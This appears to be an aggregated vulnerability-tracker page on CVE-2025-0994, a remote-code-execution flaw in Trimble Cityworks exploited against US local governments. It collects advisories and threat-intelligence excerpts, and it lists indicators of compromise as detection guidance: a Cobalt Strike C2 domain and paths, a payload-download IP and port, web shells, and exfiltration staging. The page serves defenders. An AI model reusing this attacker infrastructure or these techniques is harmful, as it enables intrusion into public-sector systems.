CVE-2025-0994
published 2025-02-06CVE-2025-0994: Trimble Cityworks versions prior to 15.8.9 and Cityworks with office companion versions prior to 23.10 are vulnerable to a deserialization vulnerability. This…
PriorityP190high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
KEVITW
CISA Known Exploited Vulnerabilitydue 2025-02-28
Exploited in the wild
EPSS
27.43%
97.8th percentile
Trimble Cityworks versions prior to 15.8.9 and Cityworks with office companion versions prior to 23.10 are vulnerable to a deserialization vulnerability. This could allow an authenticated user to perform a remote code execution attack against a customer’s Microsoft Internet Information Services (IIS) web server.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| trimble | cityworks | < 23.10 | 23.10 |
| trimble | cityworks | < 15.8.9 | 15.8.9 |
| trimble | cityworks | >= 23.0 < 23.10 | 23.10 |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect web shell deployment (AntSword, chinatso/Chopper, Behinder) under the Cityworks IIS web root paths, particularly c:\inetpub\wwwroot\CityworksServer\. ↗
- →Hunt for Cobalt Strike beacons with Watermark 987654321 and C2 domain lgaircon.xyz; both beacon configs share this watermark value. ↗
- →Detect Cobalt Strike beacon traffic to lgaircon.xyz mimicking OWA paths (/owa/OPWiaTU-ZEbuwIAKGPHoQAP006-PTsjBGKQUxZorq2 and /owa/idQ0RKiA2O1i9KKDzKRdmIBmkA8uQxmFzpBGRzGjaqG) with a fake Microsoft telemetry cookie header. ↗
- →Alert on PowerShell Invoke-WebRequest calls from IIS worker processes downloading executables from 192.210.239.172 on port 3219 to C:\windows\temp\. ↗
- →TetraLoader (Rust-based) injects shellcode into notepad.exe; monitor for notepad.exe spawned by non-interactive parent processes or with injected remote threads. ↗
- →Monitor for Cobalt Strike spawn-to processes dllhost.exe and gpupdate.exe being used as injection targets (x86: syswow64, x64: sysnative), which are non-default spawn-to values indicating custom beacon profiles. ↗
- →Detect staging of files from the Cityworks web root into the Uploads subdirectory, which UAT-6382 used to pre-position data for exfiltration. ↗
- ·The Cobalt Strike beacon C2 URI paths for the second beacon config (/owa/...) mimic legitimate Microsoft OWA endpoints; defenders should not whitelist OWA-like URIs to lgaircon.xyz. ↗
- ·Trimble warns that some on-premises Cityworks deployments may have overprivileged IIS identity permissions; IIS should not run with local or domain-level administrative privileges, which amplifies RCE impact. ↗
- ·Some Cityworks deployments have incorrect attachment directory configurations; the vendor recommends restricting attachment root folders to contain only attachments to limit post-exploitation web shell placement. ↗
- ·TetraLoader is built with the publicly available MaLoader framework (appeared on GitHub December 2024); signatures for TetraLoader may need to account for multiple encoding/encryption options MaLoader supports. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv4.08.6HIGHCVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck8.6HIGH
cisa8.6HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA ICS
Trimble Cityworks (Update A)
cisa_ics·2025-02-11·CVSS 8.6
[HIGH] Trimble Cityworks (Update A)
ICS Advisory
##
Trimble Cityworks (Update A)
Last RevisedFebruary 11, 2025
Alert CodeICSA-25-037-04
Related topics:
Industrial Control System Vulnerabilities, Industrial Control Systems
View CSAF
## 1. EXECUTIVE SUMMARY
- CVSS v4 8.6
- ATTENTION: Exploitable remotely/low attack complexity/known public exploitation
- Vendor: Trimble
- Equipment: Cityworks
- Vulnerability: Deserialization of Untrusted Data
## 2. RISK EVALUATION
Successful exploitation of this vulnerability could allow an authenticated user to perform a remote code execution.
## 3. TECHNICAL DETAILS
## 3.1 AFFECTED PRODUCTS
The following versions of Trimble Cityworks, an asset and work management system, are affected:
- Cityworks: All versions prior to 15.8.9
- Cityworks with office c
CISA
Trimble Cityworks Deserialization Vulnerability
cisa·2025-02-07·CVSS 8.6
CVE-2025-0994 [HIGH] CWE-502 Trimble Cityworks Deserialization Vulnerability
Vulnerability: Trimble Cityworks Deserialization Vulnerability
Affected: Trimble Cityworks
Trimble Cityworks contains a deserialization vulnerability. This could allow an authenticated user to perform a remote code execution attack against a customer's Microsoft Internet Information Services (IIS) web server.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://learn.assetlifecycle.trimble.com/i/1532182-cityworks-customer-communication-2025-02-05-docx/0?; https://www.cisa.gov/news-events/ics-advisories/icsa-25-037-04 ; https://nvd.nist.gov/vuln/detail/CVE-2025-0994
Remediation Due Date: 2025-02-28
GHSA
GHSA-m5q8-8x36-w25p: Trimble Cityworks versions prior to 15
ghsa_unreviewed·2025-02-06
CVE-2025-0994 [HIGH] CWE-502 GHSA-m5q8-8x36-w25p: Trimble Cityworks versions prior to 15
Trimble Cityworks versions prior to 15.8.9 and Cityworks with office companion versions prior to 23.10 are vulnerable to a deserialization vulnerability. This could allow an authenticated user to perform a remote code execution attack against a customer’s Microsoft Internet Information Services (IIS) web server.
VulnCheck
Trimble Cityworks Deserialization Vulnerability
vulncheck·2025·CVSS 8.6
CVE-2025-0994 [HIGH] CWE-502 Trimble Cityworks Deserialization Vulnerability
Trimble Cityworks Deserialization Vulnerability
Trimble Cityworks contains a deserialization vulnerability. This could allow an authenticated user to perform a remote code execution attack against a customer's Microsoft Internet Information Services (IIS) web server.
Affected: Trimble Cityworks
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.cisa.gov/news-events/ics-advisories/icsa-25-037-04; https://learn.assetlifecycle.trimble.com/i/1532182-cityworks-customer-communication-2025-02-06-docx/0?; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.recordedfuture.com/blog/trimble-cityworks-cve-2025-0994-vulnerability-analysis; https
No detection rules found.
No public exploits indexed.
Talos
UAT-8302 and its box full of malware
blogs_talos·2026-05-05
CVE-2025-0994 UAT-8302 and its box full of malware
## UAT-8302 and its box full of malware
Cisco Talos is disclosing UAT-8302, a sophisticated, China-nexus advanced persistent threat (APT) group targeting government entities in South America since at least late 2024 and government agencies in southeastern Europe in 2025.
After successful compromises, UAT-8302 deploys multiple custom-made malware families that have previously been used by other known China-nexus threat actors.
Talos discovered a .NET-based backdoor we track as “NetDraft” that is a C#-based variant of the FinalDraft/SquidDoor malware family developed and operated by Jewelbug / REF7707 / CL-STA-0049 / LongNosedGoblin , a cluster of China-nexus APT actors.
Furthermore, UAT-8302 also uses an updated version of the CloudSorcerer backdoor , a malware family used in attacks ag
Hackernews
China-Linked TA416 Targets European Governments with PlugX and OAuth-Based Phishing
blogs_hackernews·2026-04-03
China-Linked TA416 Targets European Governments with PlugX and OAuth-Based Phishing
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## China-Linked TA416 Targets European Governments with PlugX and OAuth-Based Phishing
A China-aligned threat actor has set its sights on European government and diplomatic organizations since mid-2025, following a two-year period of minimal targeting in the region.
The campaign has been attributed to TA416 , a cluster of activity that overlaps with DarkPeony, RedDelta, Red Lich, SmugX, UNC6384, and Vertigo Panda.
"This TA416 activity included multiple waves of web bug and malware delivery campaigns against diplomatic missions to the European Union and NATO across a range of European countries," Proofpoint researchers Mark Kel
Talos
Ghosted by a cybercriminal
blogs_talos·2025-05-22
Ghosted by a cybercriminal
## Ghosted by a cybercriminal
Welcome to this week’s edition of the Threat Source newsletter.
Talos recently published research into how threat actors are increasingly teaming up across the attack chain. Each group handles a slice of the operation, passing the breach along like a relay baton.
It’s a concerning trend — one that we believe calls for rethinking traditional threat modeling . But one thing stood out to me while reading: cybercriminals are often terrible at teamwork.
What if the ransomware affiliate is waiting on credentials that never arrive? The access broker sells a foothold, but the tooling meant to exploit it isn’t ready, doesn’t work in the target environment or never shows up at all?
Ghosting isn’t limited to dating apps or job interviews (and if you’ve been through
Bleepingcomputer
Chinese hackers breach US local governments using Cityworks zero-day
blogs_bleepingcomputer·2025-05-22·CVSS 8.6
[HIGH] Chinese hackers breach US local governments using Cityworks zero-day
## Chinese hackers breach US local governments using Cityworks zero-day
## Sergiu Gatlan
These attacks started in January 2025, when Cisco Talos observed the first signs of reconnaissance activity within the breached organizations' networks.
"Talos has found intrusions in enterprise networks of local governing bodies in the United States (U.S.), beginning January 2025 when initial exploitation first took place. Upon gaining access, UAT-6382 expressed a clear interest in pivoting to systems related to utilities management," said Cisco Talos security researchers Asheer Malhotra and Brandon White.
"The web shells, including AntSword, chinatso/Chopper and generic file uploaders, contained messaging written in the Chinese language. Furthermore, the custom tooling, TetraLoader, was built usi
Talos
UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware
blogs_talos·2025-05-22·CVSS 5.3
CVE-2025-0994 [MEDIUM] UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware
## UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware
Cisco Talos has observed exploitation of CVE-2025-0994 , a remote-code-execution vulnerability in Cityworks, a popular asset management system.
The Cybersecurity and Infrastructure Security Agenc y (CISA) and Trimble have both released advisories pertaining to this vulnerability, with Trimble’s advisory specifically listing indicators of compromise (IOCs) related to the intrusion exploiting the CVE.
IOCs pertaining to intrusions discovered by Talos that involve the exploitation of CVE-2025-0994 overlap with those listed in Trimble’s advisory.
Talos clusters this set of intrusions, exploiting CVE-2025-0994, under the “UAT-6382” umbrella of activity. Based on tooling and tactics, techniques and procedures (TTPs) emp
Talos
Ghosted by a cybercriminal
blogs_talos·2025-05-22
Ghosted by a cybercriminal
Welcome to this week’s edition of the Threat Source newsletter.
Talos recently published research into how threat actors are increasingly teaming up across the attack chain. Each group handles a slice of the operation, passing the breach along like a relay baton.
It’s a concerning trend — one that we believe calls for rethinking traditional threat modeling. But one thing stood out to me while reading: cybercriminals are often terrible at teamwork.
What if the ransomware affiliate is waiting on credentials that never arrive? The access broker sells a foothold, but the tooling meant to exploit it isn’t ready, doesn’t work in the target environment or never shows up at all?
Ghosting isn’t limited to dating apps or job interviews (and if you’ve been through six interview rounds and still h
Talos
UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware
blogs_talos·2025-05-22·CVSS 5.3
CVE-2025-0994 [MEDIUM] UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware
- Cisco Talos has observed exploitation of CVE-2025-0994, a remote-code-execution vulnerability in Cityworks, a popular asset management system.
- The Cybersecurity and Infrastructure Security Agency (CISA) and Trimble have both released advisories pertaining to this vulnerability, with Trimble’s advisory specifically listing indicators of compromise (IOCs) related to the intrusion exploiting the CVE.
- IOCs pertaining to intrusions discovered by Talos that involve the exploitation of CVE-2025-0994 overlap with those listed in Trimble’s advisory.
- Talos clusters this set of intrusions, exploiting CVE-2025-0994, under the “UAT-6382” umbrella of activity. Based on tooling and tactics, techniques and procedures (TTPs) employed by the threat actor, Talos assesses with high confidence that the
Checkpoint
10th February – Threat Intelligence Report
blogs_checkpoint·2025-02-10
CVE-2025-0994 10th February – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 10th February – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 10th February, please download our Threat Intelligence Bulletin .
TOP ATTACKS AND BREACHES
Grubhub, the US-based online food ordering and delivery platform, suffered a data breach due to unauthorized access through a compromised third-party service provider’s account. The incident exposed personal details of customers, drivers, and merchants, including names, email addresses, phone numbers, payment card types
Bleepingcomputer
Hackers exploit Cityworks RCE bug to breach Microsoft IIS servers
blogs_bleepingcomputer·2025-02-07·CVSS 8.6
[HIGH] Hackers exploit Cityworks RCE bug to breach Microsoft IIS servers
## Hackers exploit Cityworks RCE bug to breach Microsoft IIS servers
## Bill Toulas
Software vendor Trimble is warning that hackers are exploiting a Cityworks deserialization vulnerability to remotely execute commands on IIS servers and deploy Cobalt Strike beacons for initial network access.
Trimble Cityworks is a Geographic Information System (GIS)-centric asset management and work order management software designed primarily for local governments, utilities, and public works organizations.
The product helps municipalities and infrastructure agencies manage public assets, process work orders, handle permitting and licensing, capital planning, and budgeting, among other things.
The flaw, tracked as CVE-2025-0994 , is a high severity (CVSS v4.0 score: 8.6) deserialization problem that
Recorded Future
Trimble Cityworks: CVE-2025-0994: Active Exploitation
blogs_recorded_future·CVSS 8.6
CVE-2025-0994 [HIGH] Trimble Cityworks: CVE-2025-0994: Active Exploitation
## Trimble Cityworks: CVE-2025-0994
## What is CVE-2025-0994?
CVE-2025-0994 is a high-severity deserialization vulnerability in Trimble Cityworks , an asset management and work order software designed for local governments and utilities. The critical infrastructure sectors Cityworks services include water and wastewater systems, energy, transportation systems, government services and facilities, and communications.
The vulnerability affects Cityworks versions before 15.8.9 and Cityworks with Office Companion versions before 23.10.
Successfully exploiting CVE-2025-0994 can allow authenticated attackers to conduct remote code execution (RCE) against a target’s Microsoft Internet Information Services (IIS) web server.
## Insikt Group’s Assessment of CVE-2025-0994
Indicators of compromis
Recorded Future
Trimble Cityworks: CVE-2025-0994: Active Exploitation
blogs_recorded_future·CVSS 8.6
CVE-2025-0994 [HIGH] Trimble Cityworks: CVE-2025-0994: Active Exploitation
# Trimble Cityworks: CVE-2025-0994
## What is CVE-2025-0994?
CVE-2025-0994 is a high-severity deserialization vulnerability in Trimble Cityworks, an asset management and work order software designed for local governments and utilities. The critical infrastructure sectors Cityworks services include water and wastewater systems, energy, transportation systems, government services and facilities, and communications.
The vulnerability affects Cityworks versions before 15.8.9 and Cityworks with Office Companion versions before 23.10.
Successfully exploiting CVE-2025-0994 can allow authenticated attackers to conduct remote code execution (RCE) against a target’s Microsoft Internet Information Services (IIS) web server.
Figure 1: Login page on an exposed Cityworks instance (Source: Recorded
2025-02-06
Published
2025-02-07
Added to CISA KEV
Exploited in the wild